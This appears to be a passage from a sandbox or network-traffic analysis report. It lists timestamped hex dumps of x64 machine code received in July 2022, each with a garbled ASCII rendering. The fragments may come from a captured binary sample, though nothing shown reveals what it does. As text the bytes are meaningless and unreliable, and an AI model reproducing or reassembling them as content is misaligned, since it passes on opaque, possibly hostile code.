                                                                                                                                                            2022-07-07 07:51:09 UTC202INData Raw: f8 02 75 e3 48 8b ca e8 08 cf 01 00 48 8b 0b 48 0f af c8 48 89 0b e9 4c 1e fd ff c7 43 08 02 00 00 00 4c 89 03 e9 3d 1e fd ff 83 f8 02 75 b8 48 63 03 48 0f af 02 c7 43 08 02 00 00 00 48 89 03 e9 22 1e fd ff ba 01 00 00 00 e8 45 0b 02 00 48 c7 43 10 00 00 00 00 e9 18 1e fd ff cc cc cc cc cc cc cc cc 48 c7 43 10 00 00 00 00 e9 d6 06 fe ff cc cc cc 48 c7 43 10 00 00 00 00 e9 11 03 fe ff cc cc cc 48 83 79 10 00 0f 85 b8 ee fd ff e8 d0 f4 02 00 48 8b 43 10 e9 ae ee fd ff cc cc cc cc cc cc cc 4d 85 c0 0f 85 8d cd fd ff 48 85 ff 0f 85 33 cd fd ff e9 dd cc fd ff cc cc cc cc cc cc cc cc cc 48 8b 4b 10 48 8b 79 18 48 85 c9 74 0a ba 01 00 00 00 e8 e9 6e 02 00 ff 4b 08 48 89 7b 10 c6 43 19 00 e9 68 20 fd ff ff 49 08 e9 65 20 fd ff cc 41 83 e8 01 0f 84 ec da fd ff 41
                                                                                                                                                            Data Ascii: uHHHHLCL=uHcHCH"EHCHCHCHyHCMH3HKHyHtnKH{Ch Ie AA
                                                                                                                                                            2022-07-07 07:51:09 UTC206INData Raw: 41 0a 48 8b cb e8 e5 c5 03 00 b8 01 00 00 00 e9 59 c5 fd ff cc cc cc cc cc cc cc cc cc cc cc 48 8d 0d a9 26 09 00 41 83 c8 ff ba 83 00 00 00 e8 bb c5 03 00 b8 01 00 00 00 48 83 c4 28 c3 cc 8b 0f 48 8b 04 ca 44 8b 00 41 83 f8 24 75 1f c6 84 24 f0 00 00 00 01 8d 41 01 89 07 8b c0 48 8b 0c c2 66 83 79 08 00 74 d7 e9 40 e9 fd ff 41 83 f8 1e 74 e3 8b 0f 49 8b 47 08 48 8b 0c c8 44 0f bf 41 0a ba 69 00 00 00 48 8d 0d 41 26 09 00 e9 aa 00 00 00 80 bc 24 f0 00 00 00 00 0f 85 7b e9 fd ff 45 8d 48 01 41 8b c1 44 89 0f 4a 8b 0c ca 0f b7 41 08 66 83 f8 49 74 06 66 83 f8 4a 75 06 41 8d 41 01 89 07 44 8b 07 4a 8b 0c c2 e8 8e bf 01 00 84 c0 74 17 41 ff c0 44 89 07 83 fd ff 0f 85 41 e9 fd ff 41 8b ed e9 39 e9 fd ff ba 69 00 00 00 48 8d 0d d7 25 09 00 eb 3f 8b 0f 49 8b 47
                                                                                                                                                            Data Ascii: AHYH&AH(HDA$u$AHfyt@AtIGHDAiHA&${EHADJAfItfJuAADJtADAA9iH%?IG
                                                                                                                                                            2022-07-07 07:51:09 UTC210INData Raw: 01 00 00 48 8d 15 80 77 06 00 41 b8 08 00 00 00 48 8b cb e8 a6 33 fe ff 85 c0 75 71 48 8d 53 10 4c 8d 44 24 30 48 8b cf e8 05 d4 01 00 3c 01 75 3a 48 8d 54 24 30 48 8b cf e8 24 0b fe ff 48 8d 54 24 30 4c 8b ce 44 8b c0 8b 45 00 48 8b cf 89 44 24 28 48 89 5c 24 20 e8 25 e5 fc ff 33 db 84 c0 0f 95 c3 8b c3 e9 23 01 00 00 44 8b 45 00 4c 8d 0d 6c 79 06 00 48 8b d6 48 8b cf 48 89 5c 24 20 e8 ec ea 02 00 33 c0 e9 01 01 00 00 48 8d 15 7e 79 06 00 41 b8 0f 00 00 00 48 8b cb e8 1c 33 fe ff 85 c0 74 1d 48 8d 15 85 79 06 00 41 b8 03 00 00 00 48 8b cb e8 03 33 fe ff 85 c0 0f 85 14 ff ff ff 41 bc 01 00 00 00 4c 89 ac 24 30 20 00 00 45 8b ec 48 8b 8c 24 70 20 00 00 41 b8 ff 0f 00 00 48 8b d3 e8 08 d8 04 00 84 c0 0f 84 d1 00 00 00 ff 45 00 48 8b d3 48 8b cf e8 c2 d2 01
                                                                                                                                                            Data Ascii: HwAH3uqHSLD$0H<u:HT$0H$HT$0LDEHD$(H\$ %3#DELlyHHH\$ 3H~yAH3tHyAH3AL$0 EH$p AHEHH
                                                                                                                                                            2022-07-07 07:51:09 UTC214INData Raw: 42 f5 fc ff 48 8b cd e8 b1 ce fc ff 48 8b c8 e8 e9 a0 01 00 48 8b cd 0f b6 d0 e8 9e ce fc ff 48 8b c8 e8 f6 ce fd ff 90 e9 17 f5 fc ff 4c 8d 4c 24 40 4c 8d 44 24 30 48 8d 15 df 69 06 00 48 8d 4c 24 48 e8 d5 be 02 00 85 c0 74 29 48 8d 4c 24 48 e8 a7 97 00 00 44 0f b6 4e 03 8b 8e 88 00 00 00 45 33 c0 ba 89 13 00 00 e8 af be 00 00 32 c0 e9 34 eb fd ff 4c 8b 64 24 30 33 ff 48 8d 0d c2 69 06 00 41 8b 04 24 48 89 4c 24 58 4c 89 ac 24 c0 00 00 00 89 46 20 49 83 cd ff ff c0 48 63 e8 b8 20 00 00 00 bb 04 00 00 00 66 44 89 6c 24 38 48 89 7c 24 60 48 89 7c 24 68 48 f7 e5 49 0f 40 c5 48 89 7c 24 70 48 83 c0 08 49 0f 42 c5 48 8b c8 e8 6f 16 fe ff 48 85 c0 74 1b 48 8d 78 08 4c 8d 0d 3f a5 fd ff 8d 53 1c 44 8b c5 48 8b cf 89 28 e8 57 a5 fd ff 83 7e 20 01 48 89 be 80 00
                                                                                                                                                            Data Ascii: BHHHHLL$@LD$0HiHL$Ht)HL$HDNE324Ld$03HiA$HL$XL$F IHc fDl$8H|$`H|$hHI@H|$pHIBHoHtHxL?SDH(W~ H
                                                                                                                                                            2022-07-07 07:51:09 UTC230INData Raw: 8d 4c 24 50 e8 44 a3 fd ff 90 e9 4d 7a fd ff 45 0f bf 40 0a ba a1 00 00 00 49 8b cd e8 ec 68 03 00 90 e9 fe 79 fd ff cc cc cc cc cc cc 48 8d 0d 21 d2 08 00 44 89 b4 24 b0 00 00 00 e8 7c 62 00 00 4c 8d 84 24 b0 00 00 00 48 8d 54 24 48 48 8b c8 e8 17 7e fd ff 8b b4 24 b0 00 00 00 48 85 c0 0f 84 5b e0 fc ff 48 8b d8 e9 90 e0 fc ff 48 8b 08 ba a3 00 00 00 44 0f bf 41 0a 49 8b cc e8 8a 68 03 00 48 8d 4c 24 48 e8 f0 8d fc ff 90 e9 66 e1 fc ff 8b 8c 24 a8 00 00 00 48 8b 47 08 ba aa 00 00 00 48 8b 0c c8 44 0f bf 41 0a 49 8b cc e8 59 68 03 00 48 8d 4c 24 48 e8 bf 8d fc ff 90 e9 35 e1 fc ff 45 0f bf 40 0a ba 80 00 00 00 49 8b cc e8 37 68 03 00 48 8d 4c 24 48 e8 9d 8d fc ff 90 e9 13 e1 fc ff 44 0f bf 41 0a ba 72 00 00 00 49 8b cc e8 15 68 03 00 48 8d 4c 24 30 e8 ab
                                                                                                                                                            Data Ascii: L$PDMzE@IhyH!D$|bL$HT$HH~$H[HHDAIhHL$Hf$HGHDAIYhHL$H5E@I7hHL$HDArIhHL$0
                                                                                                                                                            2022-07-07 07:51:09 UTC242INData Raw: cc cc 48 89 5c 24 08 0f b6 01 48 8d 1d c1 19 06 00 41 b3 04 8a 14 18 41 ba 01 00 00 00 45 33 c9 41 22 d3 4d 8d 04 0a 41 3a d1 75 04 33 c0 eb 65 41 0f b6 00 44 84 1c 18 74 0d 4d 03 c2 41 0f b6 08 44 84 1c 19 75 f3 41 8a 08 b2 7d 3a ca 75 05 41 8b c2 eb 40 4d 03 c2 80 f9 2c 75 cf 41 38 10 74 ee 41 0f b6 00 4d 03 c2 8a 0c 18 41 22 cb 41 3a c9 74 b8 41 0f b6 00 44 84 1c 18 74 0d 4d 03 c2 41 0f b6 08 44 84 1c 19 75 f3 41 38 10 41 0f 94 c1 41 8b c1 48 8b 5c 24 08 c3 cc cc cc cc cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 41 55 41 56 4c 8b 19 41 bd 01 00 00 00 41 8b f1 4d 03 dd c1 ee 0b 41 8b f8 45 0f b6 13 4d 03 dd 41 23 f5 41 8b d9 4c 8b c2 4c 8b e1 4c 8d 35 08 38 fc ff 74 45 41 81 fa c0 00 00 00 7c 3c 41 8b c2 83 e0 3f 46 0f b6 8c
                                                                                                                                                            Data Ascii: H\$HAAE3A"MA:u3eADtMADuA}:uA@M,uA8tAMA"A:tADtMADuA8AAH\$HHXHhHpHx ATAUAVLAAMAEMA#ALLL58tEA|<A?F
                                                                                                                                                            2022-07-07 07:51:09 UTC258INData Raw: 41 0f 4c ca 41 89 08 b0 01 48 8b 5c 24 08 48 8b 7c 24 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 30 48 8d 15 63 c0 05 00 48 8b d9 e8 47 66 fd ff 85 c0 75 06 44 8d 48 78 eb 19 48 8d 15 62 c1 05 00 48 8b cb e8 2e 66 fd ff 85 c0 75 20 41 b9 88 ff ff ff 48 83 64 24 20 00 45 33 c0 33 d2 b9 00 08 00 00 ff 15 6a 73 05 00 b0 01 eb 02 32 c0 48 83 c4 30 5b c3 cc cc cc cc cc cc 48 83 ec 48 48 8d 44 24 60 45 33 c9 45 33 c0 48 89 44 24 30 33 d2 c7 44 24 28 88 13 00 00 c7 44 24 20 02 00 00 00 ff 15 dc 74 05 00 48 85 c0 0f 94 c0 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 20 57 48 83 ec 40 8b f2 8b f9 ff 15 12 6e 05 00 4c 8d 44 24 60 ba 28 00 00 00 48 8b c8 ff 15 8f 68 05 00 33 db 3b c3 75 07 33 c0 e9 9e 00 00
                                                                                                                                                            Data Ascii: ALAH\$H|$@SH0HcHGfuDHxHbH.fu AHd$ E33js2H0[HHHD$`E3E3HD$03D$(D$ tHHHH\$Hl$Ht$ WH@nLD$`(Hh3;u3
                                                                                                                                                            2022-07-07 07:51:09 UTC274INData Raw: b6 04 12 41 83 e9 06 83 e0 3f 41 8b c9 d3 e0 44 0b c0 49 ff c2 4d 3b d3 7e e4 41 81 f8 00 01 00 00 73 13 48 8b 47 48 41 f6 04 00 10 74 08 41 ba 01 00 00 00 eb 03 45 33 d2 48 3b 9f 88 00 00 00 72 1b 8b 87 a8 00 00 00 85 c0 0f 84 e3 00 00 00 48 3b 9c 24 f0 01 00 00 e9 c4 00 00 00 0f b6 13 81 fa c0 00 00 00 72 53 8b c2 4c 8d 0d 81 b8 fb ff 83 e0 3f 42 0f b6 8c 08 b0 ca 09 00 4c 8b d9 41 8b 84 89 90 ca 09 00 44 8d 04 49 41 b9 01 00 00 00 23 c2 45 03 c0 8b d0 41 8b c8 d3 e2 eb 16 41 0f b6 04 19 41 83 e8 06 83 e0 3f 41 8b c8 d3 e0 0b d0 49 ff c1 4d 3b cb 7e e5 81 fa 00 01 00 00 73 70 48 8b 47 48 f6 04 02 10 74 66 b9 01 00 00 00 eb 74 48 3b 9f 80 00 00 00 75 05 45 33 d2 eb 29 48 3b 9f a0 00 00 00 77 0b 48 8d 43 ff 48 89 87 a0 00 00 00 48 8b 4f 48 0f b6 43 ff 44
                                                                                                                                                            Data Ascii: A?ADIM;~AsHGHAtAE3H;rH;$rSL?BLADIA#EAAA?AIM;~spHGHtftH;uE3)H;wHCHHOHCD
                                                                                                                                                            2022-07-07 07:51:09 UTC290INData Raw: 02 00 00 e9 70 06 00 00 4c 8b 94 24 e8 01 00 00 41 80 3a 55 44 8b 4c 24 78 45 8b c1 44 89 8c 24 08 02 00 00 74 09 49 3b db 0f 85 43 0a 00 00 44 8b 8c 24 f8 01 00 00 e9 38 06 00 00 8d 72 01 89 74 24 40 83 64 24 38 00 48 83 64 24 30 00 44 89 44 24 28 49 8d 52 03 48 8b cb 4d 8b c3 48 89 7c 24 20 e8 7b bd ff ff 83 f8 01 0f 84 10 c1 ff ff 85 c0 74 0b 3d 1c fc ff ff 0f 85 74 2b 00 00 4c 8b 94 24 e8 01 00 00 4c 8b 9c 24 f0 01 00 00 44 8b 8c 24 f8 01 00 00 41 0f b6 42 01 44 8b 84 24 08 02 00 00 c1 e0 08 48 63 c8 41 0f b6 42 02 48 0b c8 4c 03 d1 4c 89 94 24 e8 01 00 00 41 80 3a 54 0f 84 78 ff ff ff f6 84 24 18 02 00 00 01 0f 85 ca 29 00 00 49 83 c2 03 4c 89 94 24 e8 01 00 00 e9 db fd ff ff 83 fe 6a 0f 8f 1b 08 00 00 0f 84 a9 07 00 00 8b ce 83 e9 5c 0f 84 1d 07 00
                                                                                                                                                            Data Ascii: pL$A:UDL$xED$tI;CD$8rt$@d$8Hd$0DD$(IRHMH|$ {t=t+L$L$D$ABD$HcABHLL$A:Tx$)IL$j\
                                                                                                                                                            2022-07-07 07:51:09 UTC306INData Raw: 41 8b c7 41 0f af c4 99 41 f7 fe 8b c8 0f bf 83 ee 00 00 00 0f af c5 99 f7 fe 44 8b c0 0f bf 83 f0 00 00 00 41 0f af c4 99 41 f7 fe 44 8b d8 0f bf 83 f2 00 00 00 0f af c5 99 f7 fe 44 8b c8 33 c0 66 44 3b d0 0f 84 53 01 00 00 b8 00 01 00 00 66 44 85 d0 74 54 44 0f bf 9b f0 00 00 00 b8 02 00 00 00 44 84 d0 75 42 41 f6 c2 04 75 3c 41 8b c4 41 f6 c2 08 74 11 41 2b c6 b9 02 00 00 00 99 f7 f9 41 8d 0c 07 eb 22 99 f7 7c 24 70 3b c8 7e 19 41 8b c6 41 8b cc 41 2b c7 41 2b c3 41 0f af c4 99 41 f7 fe 2b c8 41 2b cb b8 00 02 00 00 66 44 85 d0 74 5b 44 0f bf 8b f2 00 00 00 41 f6 c2 20 75 4d 41 f6 c2 40 75 47 8b c5 45 84 d2 79 19 2b c6 41 b8 02 00 00 00 99 41 f7 f8 0f bf 93 ee 00 00 00 44 8d 04 02 eb 2e 99 f7 7c 24 70 0f bf 93 ee 00 00 00 44 3b c0 7e 1d 8b c6 44 8b c5
                                                                                                                                                            Data Ascii: AAADAADD3fD;SfDtTDDuBAu<AAtA+A"|$p;~AAA+A+AA+A+fDt[DA uMA@uGEy+AAD.|$pD;~D
                                                                                                                                                            2022-07-07 07:51:09 UTC322INData Raw: 05 8a 4d 06 00 01 ff 15 e6 73 04 00 48 8b 0d f7 4d 06 00 48 8b d8 48 85 c0 74 38 b2 01 e8 10 fd ff ff 48 8b 0d e1 4d 06 00 ff 15 bb 73 04 00 45 33 c9 45 33 c0 ba f5 00 00 00 48 8b cb ff 15 77 75 04 00 48 8b 0d c0 4d 06 00 33 d2 e8 e1 fc ff ff eb 3b 45 33 c9 45 33 c0 41 8d 51 10 ff 15 57 75 04 00 b9 fa 00 00 00 ff 15 3c 6b 04 00 48 8b 0d 95 4d 06 00 ff 15 b7 74 04 00 85 c0 74 0f 48 8b 0d 84 4d 06 00 33 d2 ff 15 3c 74 04 00 33 c0 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 48 83 ec 40 8b 9c 24 80 00 00 00 33 ff 41 8b f1 49 8b e8 4c 8b e2 4c 8b e9 40 88 3d ba 4c 06 00 85 db 74 3e c6 05 b0 4c 06 00 01 ff 15 cb 6a 04 00 4c 8d 4c 24 30 89 44 24 30 48 8d 84 24 80 00 00 00 4c 8d 05 83 fe ff ff
                                                                                                                                                            Data Ascii: MsHMHHt8HMsE3E3HwuHM3;E3E3AQWu<kHMttHM3<t3H\$0H _H\$Hl$Ht$WATAUH@$3AILL@=Lt>LjLL$0D$0H$L
                                                                                                                                                            2022-07-07 07:51:09 UTC338INData Raw: 00 33 c9 89 7c 24 28 44 8b cd 21 4c 24 20 89 4c 24 30 48 8d 0d d9 22 07 00 45 8b c7 48 8b d6 e8 0e fd ff ff 83 7b 18 00 0f 8e d0 00 00 00 8b 4c 24 30 48 8d 83 1c 08 00 00 4c 8d 73 20 48 89 44 24 38 4c 8d 6b 1c 80 38 08 41 8b 7d 00 45 8b 26 0f 84 69 02 00 00 80 38 0a 0f 84 f9 01 00 00 80 38 0c 0f 84 7b 01 00 00 80 38 0e 0f 84 f4 00 00 00 80 38 10 0f 84 be 00 00 00 80 38 12 74 37 80 38 14 74 16 80 38 18 44 8a a4 24 90 00 00 00 75 47 89 bc 24 98 00 00 00 eb 45 85 ff 8b bc 24 98 00 00 00 0f 84 6e 02 00 00 41 b4 01 44 88 a4 24 90 00 00 00 eb 29 45 8b cf 45 8b c4 8b d7 48 8b ce ff 15 f3 29 04 00 48 8b 44 24 38 8b 4c 24 30 44 8a a4 24 90 00 00 00 8b bc 24 98 00 00 00 ff c1 48 ff c0 49 83 c5 08 49 83 c6 08 3b 4b 18 89 4c 24 30 48 89 44 24 38 0f 8c 48 ff ff ff 48
                                                                                                                                                            Data Ascii: 3|$(D!L$ L$0H"EH{L$0HLs HD$8Lk8A}E&i88{888t78t8D$uG$E$nAD$)EEH)HD$8L$0D$$HII;KL$0HD$8HH
                                                                                                                                                            2022-07-07 07:51:09 UTC354INData Raw: 48 8b 97 c0 00 00 00 48 83 64 24 20 00 44 8b cd 41 b8 00 00 00 80 48 8b c8 ff 15 cb f7 03 00 48 8b 0d 84 f7 03 00 48 89 4c 24 48 48 8b f8 48 89 44 24 40 48 85 c0 75 0e 45 33 c9 8d 50 16 41 b8 ef be ad de eb 39 48 8d 54 24 70 48 8b c8 ff 15 9e f7 03 00 8b 4c 24 70 48 c1 e1 20 8b c0 48 0b c8 48 89 4b 18 40 84 f6 74 0d 48 8b d7 48 8b cb e8 ad 64 ff ff eb 10 45 33 c0 41 b1 01 33 d2 48 8b cb e8 6b 62 ff ff 48 8d 4c 24 40 8a d8 e8 7f 60 fe ff 8a c3 48 8b 5c 24 60 48 8b 6c 24 68 48 8b 74 24 78 48 83 c4 50 5f c3 cc cc cc cc cc cc cc cc 48 89 5c 24 18 55 56 57 41 54 41 55 48 83 ec 70 83 ba e4 00 00 00 04 8b b1 90 00 00 00 45 8a e9 45 8a e0 48 8b ea 48 8b d9 75 04 0f ba ee 17 8b 82 e0 00 00 00 4c 8b 52 60 48 83 64 24 38 00 4c 8b 4a 40 44 0f b7 82 e8 00 00 00 83 64
                                                                                                                                                            Data Ascii: HHd$ DAHHHL$HHHD$@HuE3PA9HT$pHL$pH HHK@tHHdE3A3HkbHL$@`H\$`Hl$hHt$xHP_H\$UVWATAUHpEEHHuLR`Hd$8LJ@Dd
                                                                                                                                                            2022-07-07 07:51:09 UTC370INData Raw: 24 f8 01 00 00 40 80 c5 69 4d 63 ef 48 63 de 4d 8b 60 48 40 88 2f 48 ff c7 3b f1 74 21 c6 07 5e 4c 3b f1 74 06 8d 4f 01 41 2b ce 8b c1 4c 8d 77 01 88 4f 02 c1 f8 08 48 83 c7 03 88 47 fe 48 8b 94 24 90 00 00 00 4d 8b c5 48 8b cf e8 b1 9f fb ff 4c 8b 8c 24 08 01 00 00 4c 8b 84 24 f8 01 00 00 4d 3b cc 73 51 41 0f b6 11 48 8b c3 48 f7 d8 41 0f b6 41 01 1b c9 c1 e2 08 0b d0 49 8b 40 48 83 e1 03 ff c1 03 d1 41 8a cf 41 03 d7 c1 fa 08 88 10 48 8b c3 48 f7 d8 49 8b 40 48 1b d2 41 02 49 01 83 e2 03 ff c2 02 ca 88 48 01 49 83 40 48 02 49 83 c1 02 eb aa ff ce 33 c9 49 03 fd 48 ff cb 3b f1 4c 89 a4 24 08 01 00 00 0f 8d 3e ff ff ff 48 8b 5c 24 70 48 8b 94 24 a8 00 00 00 33 ed 4c 3b f5 74 57 8b cf 48 8b d7 41 2b ce ff c1 48 63 c1 48 2b d0 44 0f b6 42 01 0f b6 42 02 41
                                                                                                                                                            Data Ascii: $@iMcHcM`H@/H;t!^L;tOA+LwOHGH$MHL$L$M;sQAHHAAI@HAAHHI@HAIHI@HI3IH;L$>H\$pH$3L;tWHA+HcH+DBBA
                                                                                                                                                            2022-07-07 07:51:09 UTC386INData Raw: ff 8b c6 4c 8d 9c 24 90 00 00 00 49 8b 5b 20 49 8b 6b 28 49 8b 73 30 41 0f 28 73 f0 49 8b e3 41 5d 41 5c 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 30 48 8b 54 24 70 0f 29 74 24 20 49 8b f1 41 8b f8 66 0f 28 f1 48 85 d2 74 14 48 8d 0d 91 62 06 00 e8 1c d6 fd ff 89 05 3e 63 06 00 eb 06 8b 05 36 63 06 00 83 f8 ff 75 04 33 c0 eb 69 66 0f 2e 35 5d 35 04 00 48 63 c8 48 8b 05 03 63 06 00 48 8b 0c c8 48 8b 19 7a 02 74 12 f2 0f 59 35 38 35 04 00 f2 0f 2c c6 89 83 c0 00 00 00 83 ff ff 74 06 89 bb c4 00 00 00 8b 44 24 60 83 f8 ff 74 06 89 83 c8 00 00 00 48 8d 8b a0 00 00 00 48 8b d6 e8 1d 1e fb ff 44 8b 5c 24 68 b8 01 00 00 00 44 89 9b cc 00 00 00 48 8b 5c 24 40 48 8b 74 24 48 0f 28 74 24 20 48 83 c4 30 5f c3 cc cc cc cc
                                                                                                                                                            Data Ascii: L$I[ Ik(Is0A(sIA]A\_H\$Ht$WH0HT$p)t$ IAf(HtHb>c6cu3if.5]5HcHcHHztY585,tD$`tHHD\$hDH\$@Ht$H(t$ H0_
                                                                                                                                                            2022-07-07 07:51:09 UTC402INData Raw: 8b cb c7 44 24 28 01 00 00 00 44 89 5c 24 20 ff 15 8d 36 03 00 48 39 74 24 30 74 03 40 b6 01 49 8b ce e8 0b 33 fa ff 4c 8d 5c 24 40 40 8a c6 49 8b 5b 30 49 8b 6b 40 49 8b 73 48 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 cc cc cc cc cc cc cc cc cc cc 48 8b c4 48 89 58 08 89 50 10 55 56 57 48 81 ec c0 00 00 00 48 63 fa 4c 8d 48 18 4c 8d 40 20 8b d7 48 8b f1 e8 27 99 fe ff 45 33 d2 41 3a c2 75 07 33 c0 e9 d5 07 00 00 48 8b 86 a0 00 00 00 48 63 8c 24 f8 00 00 00 4c 8b 86 c8 00 00 00 48 8b 0c c8 48 63 84 24 f0 00 00 00 48 83 ca ff 48 8b 29 49 8b 0c c0 48 8b 19 48 89 5c 24 38 0f b6 8b f4 00 00 00 83 f9 11 0f 8f 64 05 00 00 0f 84 4d 05 00 00 83 f9 02 0f 8c 11 07 00 00 8d 7a 04 3b cf 0f 8e 11 05 00 00 83 f9 0a 0f 84 67 04 00 00 83 f9 0b 0f 84 69 02 00 00 83 f9 0c 0f
                                                                                                                                                            Data Ascii: D$(D\$ 6H9t$0t@I3L\$@@I[0Ik@IsHIA_A^A]A\_HHXPUVWHHcLHL@ H'E3A:u3HHc$LHHc$HH)IHH\$8dMz;gi
                                                                                                                                                            2022-07-07 07:51:09 UTC418INData Raw: 84 24 00 03 00 00 fe 01 00 00 e8 c3 80 fa ff 48 8d 54 24 70 48 8d 4c 24 48 e8 04 91 fa ff 48 8b 54 24 48 4c 8d 9c 24 08 03 00 00 41 b9 19 00 02 00 45 33 c0 48 c7 c1 00 00 00 80 4c 89 5c 24 20 ff 15 2c e9 02 00 41 3b c4 0f 85 81 00 00 00 48 8b 8c 24 08 03 00 00 48 8d 84 24 00 03 00 00 45 33 c9 48 89 44 24 28 48 8d 84 24 c0 00 00 00 45 33 c0 33 d2 48 89 44 24 20 ff 15 eb e8 02 00 41 3b c4 75 3e 8b 84 24 00 03 00 00 48 8d 8c 24 c0 00 00 00 48 8b d5 d1 e8 89 84 24 00 03 00 00 66 44 89 a4 44 c0 00 00 00 e8 d1 e5 fa ff 41 3b c4 75 10 48 8d 4c 24 70 48 8b d6 ff 15 8a f8 02 00 8b d8 48 8b 8c 24 08 03 00 00 ff 15 92 e8 02 00 41 3b dc 74 12 ff c7 c7 84 24 00 03 00 00 28 00 00 00 e9 c3 fe ff ff 48 8b 4c 24 40 ff 15 70 e8 02 00 48 8d 4c 24 48 e8 06 9e f9 ff 4c 8d 9c
                                                                                                                                                            Data Ascii: $HT$pHL$HHT$HL$AE3HL\$ ,A;H$H$E3HD$(H$E33HD$ A;u>$H$H$fDDA;uHL$pHH$A;t$(HL$@pHL$HL
                                                                                                                                                            2022-07-07 07:51:09 UTC434INData Raw: 89 74 24 20 e8 69 88 ff ff 49 8b cf 8b d8 e8 1f b3 f9 ff 4c 8d 5c 24 40 49 8b 6b 38 49 8b 73 40 41 89 1f 49 8b 5b 30 41 c7 47 08 01 00 00 00 33 c0 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 83 ce ff 48 83 7a 10 02 49 8b e8 48 8b da 76 0f 48 8b 42 08 48 8b 48 10 e8 ff 40 fa ff 8b f0 48 8b 53 08 48 8b 4a 08 48 8b 1a e8 ed 40 fa ff 48 8b cb 8b f8 e8 e3 40 fa ff 48 8d 0d 5c a2 05 00 44 8b ce 44 8b c7 8b d0 e8 bf ab fe ff 48 8b cd 8b d8 e8 85 b2 f9 ff 48 8b 74 24 40 89 5d 00 48 8b 5c 24 30 c7 45 08 01 00 00 00 48 8b 6c 24 38 33 c0 48 83 c4 20 5f c3 cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 42 08 49 8b f8 48 8b 08 e8 87 40 fa ff 48 8d 0d 00 a2 05 00 8b d0 e8 e9 b0 fe ff 48 8b cf 8b d8 e8
                                                                                                                                                            Data Ascii: t$ iIL\$@Ik8Is@AI[0AG3IA_A^A]A\_H\$Hl$Ht$WH HzIHvHBHH@HSHJH@H@H\DDHHt$@]H\$0EHl$83H _H\$WH HBIH@HH
                                                                                                                                                            2022-07-07 07:51:09 UTC450INData Raw: 48 8b 0f 48 8b 00 48 89 41 08 48 8b 07 48 8b 48 08 48 8b 01 ff 50 08 e9 d3 00 00 00 48 8b 42 08 33 db 48 3b c3 0f 84 c4 00 00 00 f2 0f 10 30 e9 21 fd ff ff 48 8b 42 08 33 db 48 3b c3 0f 84 ac 00 00 00 66 0f 6e 30 e9 06 fd ff ff 48 8b 42 08 33 db 48 3b c3 0f 84 94 00 00 00 8b 18 eb 7f 48 8b 52 08 33 db 48 3b d3 0f 84 81 00 00 00 48 8b cf e8 9c 98 00 00 eb 77 81 e9 10 40 00 00 74 50 83 e9 01 74 3b 83 e9 01 74 26 83 e9 01 74 bd 83 e9 01 74 09 83 f9 01 74 04 32 c0 eb 54 48 8b 42 08 33 db 48 3b c3 74 47 48 8b 18 e9 4c fe ff ff 48 8b 42 08 33 db 48 3b c3 74 34 0f b7 18 eb 1e 48 8b 42 08 33 db 48 3b c3 74 24 0f b6 18 eb 0e 48 8b 42 08 33 db 48 3b c3 74 14 0f be 18 48 8b cf e8 4c 72 f9 ff c7 47 08 01 00 00 00 89 1f b0 01 4c 8d 9c 24 90 00 00 00 49 8b 5b 10 49 8b
                                                                                                                                                            Data Ascii: HHHAHHHHPHB3H;0!HB3H;fn0HB3H;HR3H;Hw@tPt;t&ttt2THB3H;tGHLHB3H;t4HB3H;t$HB3H;tHLrGL$I[I
                                                                                                                                                            2022-07-07 07:51:09 UTC454INData Raw: 02 00 00 44 38 7b 20 0f 84 53 02 00 00 48 8d 4c 24 30 b2 11 e8 e9 90 fe ff 44 88 7b 20 eb b3 44 38 7b 20 0f 85 37 02 00 00 48 8d 4c 24 30 b2 11 e8 cd 90 fe ff b8 01 00 00 00 88 43 20 e9 11 02 00 00 44 38 7b 22 0f 84 14 02 00 00 48 8d 4c 24 30 b2 5b e8 aa 90 fe ff 44 88 7b 22 e9 71 ff ff ff 83 e9 08 0f 84 cf 01 00 00 41 bd 01 00 00 00 41 2b cd 0f 84 a5 01 00 00 41 2b cd 0f 84 0e 01 00 00 41 2b cd 0f 84 d9 00 00 00 41 2b cd 0f 84 86 00 00 00 41 2b cd 74 49 41 3b cd 0f 85 be 01 00 00 48 8d 4c 24 30 b2 a1 e8 54 90 fe ff 45 3a e7 74 13 44 38 7b 1f 0f 85 a3 01 00 00 44 88 6b 1f e9 8d 01 00 00 41 3a ef 0f 84 83 00 00 00 44 38 7b 1f 0f 84 87 01 00 00 44 88 7b 1f e9 f0 fe ff ff 48 8d 4c 24 30 b2 a0 e8 14 90 fe ff 45 3a e7 74 13 44 38 7b 1e 0f 85 63 01 00 00 44 88
                                                                                                                                                            Data Ascii: D8{ SHL$0D{ D8{ 7HL$0C D8{"HL$0[D{"qAA+A+A+A+A+tIA;HL$0TE:tD8{DkA:D8{D{HL$0E:tD8{cD
                                                                                                                                                            2022-07-07 07:51:09 UTC470INData Raw: 31 0a 00 4d 8b c5 66 89 41 0c 33 c0 89 94 24 c8 01 00 00 48 89 84 24 b6 01 00 00 48 89 84 24 be 01 00 00 66 89 84 24 c6 01 00 00 49 8b 86 e8 31 0a 00 44 89 a4 24 cc 01 00 00 48 8d 8c 24 d0 01 00 00 48 89 01 41 0f b7 86 f0 31 0a 00 66 89 41 08 33 c0 89 94 24 f0 01 00 00 48 89 84 24 da 01 00 00 48 89 84 24 e2 01 00 00 89 84 24 ea 01 00 00 66 89 84 24 ee 01 00 00 49 8b 86 f8 31 0a 00 44 89 a4 24 f4 01 00 00 48 8d 8c 24 f8 01 00 00 33 d2 48 89 01 41 0f b7 86 00 32 0a 00 66 89 41 08 33 c0 48 8d 8c 24 20 02 00 00 48 89 84 24 02 02 00 00 48 89 84 24 0a 02 00 00 89 84 24 12 02 00 00 66 89 84 24 16 02 00 00 49 8b 86 08 32 0a 00 89 bc 24 18 02 00 00 44 89 a4 24 1c 02 